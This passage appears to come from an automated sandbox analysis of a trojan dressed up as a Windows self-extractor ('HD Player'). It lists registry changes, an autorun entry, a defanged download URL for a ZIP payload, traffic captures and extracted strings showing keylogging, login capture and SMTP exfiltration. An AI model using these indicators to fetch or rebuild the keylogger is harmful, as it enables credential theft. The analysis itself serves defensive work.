"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates\4F56644858829FFB85A770171ACCF9F8407A137B]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 4F 56 64 48"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates]
"4F56644858829FFB85A770171ACCF9F8407A137B"

The process %original file name%.exe:1328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 9F AA 65 95 EB 71 8A E5 AE 68 11 8C EC DA 48"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.2180
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://www.google.com/	216.58.209.164
hxxp://www.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_4GACA	216.58.209.164
hxxp://award-soft.com/download/CONSOLE_201303.ZIP
hxxp://e6845.ce.akamaiedge.net/gb.crt
hxxp://www.award-soft.com/download/CONSOLE_201303.ZIP	64.50.163.145
hxxp://gb.symcb.com/gb.crt	23.43.133.163
ssl.gstatic.com	216.58.209.163
smtp.163.com	123.125.50.138
clients1.google.com.ua	216.58.209.163

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_4GACA HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google.com.ua

Connection: Keep-Alive

HTTP/1.1 302 Found

Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_4GACA&gws_rd=ssl

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Set-Cookie: PREF=ID=74e4a1278c9db471:FF=0:TM=1434794070:LM=1434794070:V=1:S=IGCdjKmoHuSWd2Ia; expires=Mon, 19-Jun-2017 09:54:30 GMT; path=/; domain=.google.com.ua

Set-Cookie: NID=68=LrJh6lx9lBF2VHcoHmu4Xu1CkrjbyBTKBlMitM8wDKvM0DKz1VSUrJmP0W6j9x-XZbu2G8N6pMbtDimNxy_hK5pMlg5J0Ru0RSm_1VAz0RRotdHq1FjpiOeX_uDdhDhP; expires=Sun, 20-Dec-2015 09:54:30 GMT; path=/; domain=.google.com.ua; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Date: Sat, 20 Jun 2015 09:54:30 GMT

Server: gws

Content-Length: 278

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbS
t8wey_4GACA&gws_rd=ssl">here</A>...</BODY></HTML
>..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=
cr&ei=VjiFVbjIBbSt8wey_4GACA&gws_rd=ssl..Cache-Control: private..Conte
nt-Type: text/html; charset=UTF-8..Set-Cookie: PREF=ID=74e4a1278c9db47
1:FF=0:TM=1434794070:LM=1434794070:V=1:S=IGCdjKmoHuSWd2Ia; expires=Mon
, 19-Jun-2017 09:54:30 GMT; path=/; domain=.google.com.ua..Set-Cookie:
 NID=68=LrJh6lx9lBF2VHcoHmu4Xu1CkrjbyBTKBlMitM8wDKvM0DKz1VSUrJmP0W6j9x
-XZbu2G8N6pMbtDimNxy_hK5pMlg5J0Ru0RSm_1VAz0RRotdHq1FjpiOeX_uDdhDhP; ex
pires=Sun, 20-Dec-2015 09:54:30 GMT; path=/; domain=.google.com.ua; Ht
tpOnly..P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/s
upport/accounts/bin/answer.py?hl=en&answer=151657 for more info."..Dat
e: Sat, 20 Jun 2015 09:54:30 GMT..Server: gws..Content-Length: 278..X-
XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-
Protocol: 80:quic,p=0..<HTML><HEAD><meta http-equiv="co
ntent-type" content="text/html;charset=utf-8">.<TITLE>302 Mov
ed</TITLE></HEAD><BODY>.<H1>302 Moved</H1&g
t;.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_r
d=cr&ei=VjiFVbjIBbSt8wey_4GACA&gws_rd=ssl">here</A&g
<<< skipped >>>

GET /gb.crt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: gb.symcb.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

ETag: "e8c0f1aa3be78004885d176fe999eab4:1434417022"

Last-Modified: Tue, 16 Jun 2015 01:10:22 GMT

Content-Type: text/plain

Date: Sat, 20 Jun 2015 09:54:42 GMT

Content-Length: 1117

Connection: keep-alive
0..Y0..A........:c0...*.H........0B1.0...U....US1.0...U....GeoTrust In
c.1.0...U....GeoTrust Global CA0...120827204040Z..220520204040Z0D1.0..
.U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20.."0..
.*.H.............0.........'.O....?......k...T!N....rR....[Xy..$ro.i..
...z.>..P"......I....G..sE....^...|....Cf.....F...Iyz%.Kj...v.)<
.......1e.G....K.p^k..k:l......%.>.)..lW..........?.@.......@.].^N.
b.7...t&.....l.[5.r..M!.@#\...1..hU..;T..M..N.^.oRiN...mB.Q...V<.Os
..o.#.......R.........T0..P0...U.#..0....z.h.....d..}.}e...N0...U.....
..J.s9.[i.\.=.d....U.0...U.......0.......0...U...........0:..U...3010/
.-. .)hXXp://crl.geotrust.com/crls/gtglobal.crl04.. ........(0&0$.. ..
...0...hXXp://ocsp.geotrust.com0L..U. .E0C0A..`.H...E..60301.. .......
.%hXXp://VVV.geotrust.com/resources/cps0*..U...#0!..0.1.0...U....VeriS
ignMPKI-2-2540...*.H.............<.=Z..7*.F.6..<{[email protected]..
"...Kx..M....B.........y....lB....].3.%. .S....}G..Q1D^.*.5..2........
..!j#.8d....s2;P....u.....Bk`..E.]W..-P..2.......G........vtd.....(.%D
0~........l..$'.*....1.XGt...d..2Y.)KE.[.I......D..d..h8...f..U....@..
H'L..^-.*.z.f.5HTTP/1.1 200 OK..Server: Apache..ETag: "e8c0f1aa3be7800
4885d176fe999eab4:1434417022"..Last-Modified: Tue, 16 Jun 2015 01:10:2
2 GMT..Content-Type: text/plain..Date: Sat, 20 Jun 2015 09:54:42 GMT..
Content-Length: 1117..Connection: keep-alive..0..Y0..A........:c0...*.
H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Gl
obal CA0...120827204040Z..220520204040Z0D1.0...U....US1.0...U....G
<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_4GACA

Content-Length: 262

Date: Sat, 20 Jun 2015 09:54:30 GMT

Server: GFE/2.0

Alternate-Protocol: 80:quic,p=0
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt
8wey_4GACA">here</A>...</BODY></HTML>..HTTP/1.1 3
02 Found..Cache-Control: private..Content-Type: text/html; charset=UTF
-8..Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_
4GACA..Content-Length: 262..Date: Sat, 20 Jun 2015 09:54:30 GMT..Serve
r: GFE/2.0..Alternate-Protocol: 80:quic,p=0..<HTML><HEAD>&
lt;meta http-equiv="content-type" content="text/html;charset=utf-8">
;.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1
>302 Moved</H1>.The document has moved.<A HREF="hXXp://www
.google.com.ua/?gfe_rd=cr&ei=VjiFVbjIBbSt8wey_4GACA">here</A
>...</BODY></HTML>....

GET /download/CONSOLE_201303.ZIP HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.award-soft.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 09:54:29 GMT

Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_fcgid/2.3.6

Last-Modified: Tue, 14 Jan 2014 13:45:12 GMT

ETag: "88d5ae-21eedf-4efee66c0aa00"

Accept-Ranges: bytes

Content-Length: 2223839

Connection: close

Content-Type: application/zip
PK.........x.A..GQ ...).......service.ini.v.........I,.K..U..O).I.H,.P
.q.. ..I.K.H..PK...........D....B.... *.....core.dll.:mtTU..;.;/.C.`GZ
.!H 9B...j:@.:0..........M...{.k...../.^.Qg..U...G.9{....].....Q.D.7~.
.....a..fiy[uowH#...=y.$...u.V...[UI.m...B..?.AH..O5....D....<.....
....7g..no-......m;Ko..k.n...M.-.....JW.. .....y...ei.......\]..)/.R..
.....m.~{.=l.*/N..U.g..V..x..V....\9.}ue...2....*s`....[w.9...m.=..|.L
.....\...w.e`g....LVB.;.y.....<P.N:.*....H..7.s........K.p|..N%O.;X
>.......d.. )...1.D......|..<.i...?......Q.2O)![....M.FHa.......
[email protected].............."..r..........,@@,....x-.-.#..\...;..._
K......&3.).j.t..n"...3..?...3..?...3..?.O..k..|..._....G.,$X......#..
.z1b......~.0oF....A/>b!#....%...Y.>.. l.i.....:....h:n.(..g...e
o...Jp.W..y.....o...oZ..E...T~!.j........a...0. f..dP..oZ.PC.P..PSp#,.
..rT ....A'..>. Z;.?...a.~E#..../?u..2..F.;.:%. .....b..E...^)..E#.
.....F..0..S."[email protected]...=.In....{....d@...#1Up.'v...8....D.E.XNYJ..2.
......y8Vb..0.S^....u...1..0...|F....."..........w.....tl.*....c.:<
.(..../4........}bb.....`..-....J....&,.......KM\....6h_... ...M..J../
...2....A..f.t......jns.TNn......z.9<.....PE.Y [email protected]..
a....!Q...............PvC.....*b..).N.i.?..0H.!I.j.....!rl.r....4XZ...
...$...C.3...b.U.{..:rb.j....l,. ....z...'.[.m..c....{..(.w81....;....
.q..O.gI....cGE0Rz...n.:fm.....VZ.k.^.x.Xl..........F...-...FWl.j.....
....Hb..:...F.4..~j.;{_..2..@..,.8 ._.J.V...2H....M.pl.pl\.....h.I.a8.
...M.i..M.K...>.Q...7.........6<..".}y.{th.O.?......o.t.G...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

COMCTL32.dll

VERSION.dll

advapi32.dll

advpack.dll

wininit.ini

Software\Microsoft\Windows\CurrentVersion\App Paths

setupapi.dll

setupx.dll

IXPd.TMP

TMP4351$.TMP

FINISHMSG

USRQCMD

ADMQCMD

msdownld.tmp

wextract.pdb

PSSSSSSh

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegQueryInfoKeyA

GetWindowsDirectoryA

ExitWindowsEx

MsgWaitForMultipleObjects

rundll32.exe %s,InstallHinfSection %s 128 %s

SHELL32.DLL

Software\Microsoft\Windows\CurrentVersion\RunOnce

PendingFileRenameOperations

System\CurrentControlSet\Control\Session Manager\FileRenameOperations

wextract_cleanup%d

%s /D:%s

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"

Command.com /c %s

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\

33333330

3333333

33333333

SLIPI.exe

ukb.sO$fZJ|

j.\%U

%Ch8*

Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.

CFailed to get disk space information from: %s.

System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?

8Unable to retrieve operating system version information.!Memory allocation request failed.

Filetable full.Ên not change to destination folder.

Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.

(Error creating process <%s>. Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.

Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install

Could not create folder '%s'

To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.

Error retrieving Windows folder

$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .

System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.

/C:<Cmd> -- Override Install Command defined by author.

eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?

Could not find the file: %s.

:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.

6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

WEXTRACT.EXE

Windows

Operating System

6.00.2900.2180

iexplore.exe_1632:

%?9-*09,*19}*09

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.Fg

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

Console.exe_1852:

.text

`.rdata

@.data

.rsrc

<.ucV

\$d<%u"

L$HSQSSSh

f=?0v%f=

T<%uO

cmd.exe

command.com

__MSVCRT_HEAP_SELECT

user32.dll

DisconnectNamedPipe

ConnectNamedPipe

CreateNamedPipeA

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

SHDeleteKeyA

SHLWAPI.dll

COMCTL32.dll

GetCPInfo

CryptDestroyKey

CRYPT32.dll

RegOpenKeyExA

RegCreateKeyExA

CryptExportKey

CryptImportKey

CryptDeriveKey

CryptGetUserKey

CertFreeCertificateChain

CertFreeCertificateChainEngine

CertGetCertificateChain

CertCreateCertificateChainEngine

CertGetCertificateContextProperty

CryptAcquireCertificatePrivateKey

CertDuplicateCertificateContext

CertSetCertificateContextProperty

CertFreeCertificateContext

CertNameToStrA

CertEnumCertificatesInStore

CertCloseStore

CertOpenStore

CertFindCertificateInStore

CertAddCertificateContextToStore

CertSaveStore

CertGetSubjectCertificateFromStore

CertVerifyCertificateChainPolicy

WS2_32.dll

DNSAPI.dll

d-d-d

*-*-*.ftp

*-*-*.eml

*-*-*.jpg

*-*-*.htm

Kernel32.dll

HKEY_CLASSES_ROOT\TypeLib\{1324FD68-BB6F-460D-9216-D5630DF9A3E8}

\core.dll

\runaservice.exe

Failed to configure service for auto-start(%s)

Failed to install service(%s)

Failed to install service(%d)

Run software as Windows service

RecordVisitedWebsite

LowKeystrokes

CaptureLoginInfo

RecordKeystrokes

\cacls.exe

%SystemDirectory%

ReadFile failed!(%d)

ConnectNamedPipe failed!(%d)

\\.\Pipe\2console

The keylogger has been installed on %s.

AdvSMTPPort

SMTP pwd

SMTP account

SMTP server

{7B521BCE-E5DB-43d1-A444-B3AD2591FB07}

conf.ini

{4CA39576-32D1-4626-AEE9-FFBDE57097CD}

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

%CommonAppData%

%WindowsDirectory%

%Windows%

shfolder.dll

.NET 2.0 / x64

.NET 2.0

.NET 1.*

.?AVClsHttpProxyClient@@

hXXps://

hXXp://

Unexpected exception while connecting to the SMTP server.

smtp.aol.com

Failed to connect to SMTP server.

WEBM

Failed to add decrypt cert to memory store.

Decrypt certificate is null

Invalid email address: name = [%s], address = [%s]

windows-874

windows-1256

windows-1255

windows-1253

windows-1251

windows-1258

windows-1257

windows-1254

windows-1250

windows-1252

GenerateSecretKey

Cannot do public-key encryption in chunks.

PBES2 not supported with chunks.

PBES1 not supported with chunks.

No encryption certificates were specified.

keyLength

No secret key has been set. Need a secret key for symmetric encryption algorithms

Failed to create in-memory temporary cert store

Using specific decrypt certificate.

certStore

secretKey

1.3.14.3.2.7

1.2.840.113549.3.7

2.16.840.1.101.3.4.1.42

2.16.840.1.101.3.4.1.22

2.16.840.1.101.3.4.1.2

1.2.840.113549.3.2

file.dat

No certificate store has been opened.

Software/Microsoft/SystemCertificates/AddressBook

password

.?AVClsCert@@

keyContainerName

Failed to import private key into key container.

Unable to create/open key container.

Checking if machine keyset already exists...

Checking if non-machine keyset already exists...

Re-trying with machine keyset...

Unable to get certificate thumbprint

machineKeyset

keyContainer

RSAKeyValue

ssh-dss

ssh-rsa

ddd

{[0000]}

This Zip has been encrypted with Chilkat Zip (VVV.chilkatsoft.com).

.?AVClsPrivateKey@@

ENCRYPTED PRIVATE KEY

BEGIN PRIVATE KEY

BEGIN RSA PRIVATE KEY

PKCS8 private key..

Invalid RSA DER, password may be incorrect.

Checking to see if key decrypted to valid DER...

No private key loaded

.?AVClsKeyContainer@@

No key container previously opened.

GetPrivateKey

Unsupported encryption algorithm

;*.AZ-

zeeLog.txt

zcÁ

c4aeUs/8CAABCWmgzMUFZJlNZbjaSrAABWf/f/2djtuOzXoASASoIBSICQiQAkQwwIiQwfELn6dcGsAD5EGoapmkIyYTJo9IyaMQMnqMmJo9JiMmBo9CjaT1DmmIyMmmTQDIaMhkyAAAGRpkaBhDIEipT0mg00GmgaaA0aaAyAGgAGIBpjRpJrgEkikwCFoAbAUppQsSksIWkTWiBggfJK2mXZCMdjYBmsDLYrrVCGAjGAw4MmagG3aUCA4C/whBwZmr63cX62EuXIwMQ9qiAOrHmJ3Hnwc0GnodiulxTYn1uuc9Ja2dg/m peBS5mlWiBQ53tFtg6Xg3YwNTNetgah9vkHNCiZn ROQoqpklqO/hqb1M74elMO2Pw/jzYdCxSGDoOPC/EAomhJYN6LIuSFE0BGwRgO8wLjQr7FfYJB/i7kinChINxtJVgA==

c4aeUs 0CAABCWmgzMUFZJlNZfAS/SQABXv/n/ /jImMyVAAAEBAAIAACxCCAhQIgIFIGJen3EbAA8RiNJJkaBoBppoyGgAGgxA0zTUGakVPapoZMIaGgaNNNA0AZNBiGGkppoZGhgRpoBowmRiYEAD1AZACbYJNqQ21AmoG1AmDgUAgGwTdgcCqnCVQkE6Qkp015KVKpNKQ2gSYMpOeLYftSBPaASSrkDasShq3uwmtA0 sggCnMqDIFEc5iYwHTz3EOmPu 2sAu0wsEtwRR8sCaiJmrqVxu1/vmxLBF9Ph0QITcgRb8wrdXkPWp 7i76ip0MxMRq7OqjIAiLaYAAbMF710VhaDKFVH2SKc5WPipEwSapU0q7iFUPtBc9oEAcwIAHMAcxAiH8XckU4UJB8BL9JA=

c4aeUswIDAABCWmgzMUFZJlNZ l25SAABWX//52ZromE2VoISECIIaC4SWiAAgYAADCggJDDeAxf/9wKwANkhhPU9E0AAA00AANAAAyGgZPSYZIHNGjQ0wgGmBNNAGQ0MQBoxGhgjIAJFJQ0aAADTI9QAGQ0NGhoANAAbCjaYkhDYAiPgoRst3aKLbQLCx4IkapxQJhgMaJnUYrluBKwtMdAgGdlQI6/L1flexRFenEi8KKT6qAErq7oOmzCDDEj/Dtzh7r0tKm2xDCWkQWV0IfywCKkZ0uNKQzw8cXJdM1YwpdDsP2i0cIS4LiNcAR3nGRSTmDID4fht bgl/Y/exeT71WLAnuRSdpIRHCMGbc nKAKZiSSnaAR/i7kinChIfS7cpAA=

c4aeUswIDAABCWmgzMUFZJlNZXc1e0wABWf//52frMmE2VoIxACoIiCIC0iSggBgIBUAiJDBUAtf5/4awANkhVNqaaGRoAAAADQGgNA0BkyYaRtQaHNMRkZNMmgGQ0ZDJkAAAMjTI0DCGQJFKjRpoNAaANNNBkGmQND1Bo0GgBoZMajaaSQhtJIJ/FhSV5yBSm2ApeVALbDUvoF4aTGK45rFYdtharwS0ZkDen9cVdxVccJJVz4Bwzkey s5LihRTqDNWbJbZU9HtWBmJkA0WyhB0winSA2REgUYctGqoNNcCzK4c4BA5iJe/BHpUkVwKjFJgCYCsRhcHFxDLE4/8kVYwTvtqdZyJeDHQgSo8Slf3LvVYLpIRQcedeSSI2JJKJiBH LuSKcKEgu5q9pg=

c4aeUs4UBAABCWmgzMUFZJlNZwr1xdwAAv HQYAAAAKAAAgAgAAACIAAxDAEfqRMlzcUFwCUDpvuy/i7kinChIYV64u4=

c4aeUswIDAABCWmgzMUFZJlNZNC4mNAABWf//92fjIvE2XApQCQAIQCJCQiQggAIAAiBgYiBUAmf7/4awANkhVMR6mhoAHqBoaANAA02poDQYxQ9Q0OMjTJiaDJkwmmQMhoDQGmTQwAmgMJFST0h6gaeoGg0yAyAaaeoMgGgAbRo1I3AgEhtIoNABZpX4j0hSyxpIjeiwotbNCBYk0NgTOrHAl5svsleOMWczasydR 99HIE1IwZ0AWGHD4Gm26bPVU8dxmDO7DMqPoeMAGpYonkisHeiCQ9pmMJ8ju1oyZFPiwWyzAgrb bprwQEeRUcRftBXupQiIvpGQHc7kX y1ackU /Bp5WvPghml5s YcKibZvT6uFJIxMSShaEE7El7NI8GCA/xdyRThQkDQuJjQ=

c4aeUswIDAABCWmgzMUFZJlNZOYxIOQABWH//92ZrouE2VoISECIIaC4SWiAAgYAADiggZDDeAxf/9wKwANkhhM1GgaAADQAA0A0ABoMhtExMCBwNBpkNNGhhAyGhgjQ0yaNAMgxAAGgkUlBoaBoANB6gAAPUaGgAA0AD1MylJwEkIbQRMSA3aEbK1ki4baBXd/BFdrIigTDAY0TPJpQF/VoFhhzsdAgGMyOTi6fyTgtbYFGENpOhBDjzh1ENXmg47kskFRFXexglwgUyiuo4AXC2plcAD8iO32bVNZW5lPQcDOIQIjCBnhPaSLWJTTCPbLrDgaurqppPPYz8lhD5b69j7j9KlGfa2IqM/7FL1EpESDBmrPmSgCrtJJWjSAmYJTNCnYID/F3JFOFCQOYxIOQ=

c4aeUswIDAABCWmgzMUFZJlNZVbeq6AABWX//92fjKuE2VoI3ASIIBqBCwiYRgCgEmqRiZDhYAhf598KwANkRCRTNNBGmhkYj0amnqYmBGAgGQyaep6mbVPIYTT0gcaGTTTJoAGCANBk0AAyaAAAGTIBoJFJRoAAANAAZGhkDRoA0AA0BkZD1F44AkBE0gIMSQbe7aWZSr0rUYCur2AVmGPFAjaVGEBfjyWik/thWj6ok7EgGMzN3 zikFFhI8yACsy6vqlqVS k1hI3CsfxvNF1pGRZIFpN1w65IMgNp03E7 6UBQV6Um1Z7URGSXl98NllBgn4SR9HAu2n/B/rPFURKsufWI9YbhF2wWCQlbJuhNbVgR27joe5o9tx/S69B7QI/sOPCrM1iIiBiAICOW0II2gCNgH8wAP8XckU4UJBVt6ro

c4aeUs4UBAABCWmgzMUFZJlNZl7vlQgAAone//9/u7IDACI0ACDAAEgAIAFYLAKAAAJAAizuv/rAA8jCJomSY1HqBo0GgBoMgDQNANPSBqn6JTag0AAAAAAAAAAGmqTQMgBo0AAAGmgNAGhjUeLiB0uRS4GhrXkVgQzFRxr55XSDCVjAhAL9AS RAGkJcXCwU4brWJeQNMdiBSJpAUqRCIDSAr5VCRDJSIEDChnZHScRcuTt8hw8/C/hlUYWJmV lp9Olb98qDnA5qlnJLbSWSB1DTbONZomDhJgP9Gtniu5QAnXgUPaYHNQme/JvWmwQJBeYr Y4eaLDQElM9mSoVL7sNARc3MwQiCRTVfnd7shPJxqajAPkB8pk9rIOJQRLrQkAfoKtSCOIikJCiAl8ogAV/F3JFOFCQl7vlQg=

c4aeUs4UBAABCWmgzMUFZJlNZ4XhUsgAAoP f/X/0aIqCCAEbxaQAOAQCAGYBRiWAggqCihu/57AA2SGRkwnqGRoDRoA0AAGmmmJtTCGJk/UhwDCMJpiGAQDIAYRpkyYRgIaDEiU8oaepk9IGjTTTINBoANBhMTQZNP0okY2A20BsRsTHosEiWTIskki5GRJEiRF650SyBilYCg5hTiYSJ6cgpmBESIc/S1c1ytCSZiQXPKjTLEkpdOOAIgZhYNDB5lakMgehfqPTzUH0ZDC5HCR52hu HG9u8RK68LAWEBrCZtqnTTe0Ebqyg/V9U9sgiZpiSKIRCVPl8y1qO5c0zCrqSzzaAL5bfs zlYHMgBEjBfNpiJ/Fp0HogCEsHAAW0SYIAmf/F3JFOFCQ4XhUsg==

c4aeUs4UBAABCWmgzMUFZJlNZBIkEowAApX ////07cGIsAARxeAIMAACAACMSgBsoBgIEAgPmvWvsAD2xCImmoNNNAeoAAADQA00aBtTTQGTTQiaaUPIQA0BoAAAAAAAAAGmkUnlMCYmBMmQxBo000yaZNGCYmAam0ciY6UrOEAkQEFCcAJY64rgJiEAQREpLYxCk6lEhBIYqulBzlpDC0iCbRcaogOqrCoDkAq6QsHpcbCGUiAxhCEMowERFPh KmPGggquZZKJbUdh96kk9jzABeb4aefgHM2bYwovfWSRDomW/MrslyGqP48GIAE y18cV5QpjKtVMHBqSvr2TEyc71NqjXYY4yA6Tfq0sj1lDqewikL42bs6UHHfxBN4IJAkVqOZofqcWPb DEeKAezygJJKBB/kXz0FAnWQj5QdhCAlAj/IXckU4UJAEiQSjA==

pqTkLrZ8ugJ2hzaeXqaMptKyT9ryy82rgbwoVmvTfdFM2CVLqDNx6HrUrLLHeIXp4srmrF2TvGn1/6zjI6FiLmgrwRCQbzpf5OK/c2IFQ031J1h2dy2lY4MLzN/FGJWXZpJKIDXBGScfIOzC0beofJe9zXOXyaP9jcyh2KZPnnyfUdzz79 b uzK6 b0/k/lM64OPl69 Lg6/bP Twn2/V593T4IgX/qyK5H5QhASDqlhtXhRWQN3D/w0aIr9PPzVDdcSceAX lkhwGuOCUorCBA8VrIgdgh0UvmJn3lQnkCgIGAkouwUgfM0fAjZ81NE7/QqzdRMv317yZCO4j5L8nK pgF/r QsXulfDy6T6F/K4tLUkNsduNM/1FNevHAPTf 3Nc/5/l4vj E

6s jBRdAvnbfzVLwUXZNX9LpMvLe5GIoYAAtsgalnJb5JPexKVJq7zedLn227M /1Pq2itl8KpOaHofZSnFgrs 9 0YmIAA9WfFm6NHyvDFZrl81aacFqOivfQc4mfAmYGaW2 Q  tUP/936/vzpkQgxpNDi0imqzo2MeqPVtDeFGnv/S9 EhhlmNfIvxiEBi3z4Zkq1Cv447P6esshy5N3b3NV6cQu6QH4AJUWjX9SnMUD0nm7D945qd8TtTuMhzyv7UFQj7HFOvNw7qRQeaqQ6T3YJePYKU6xZ7pZL84voKgIMP3Z9R4TmekOQ3b07MQckzKcpHYxydOn/RuYgcFOQzZmw2i2srbeGogEGZYzVkvSxjz1Gow25sEmqt2/e9mVuhgAK1r70z5j3

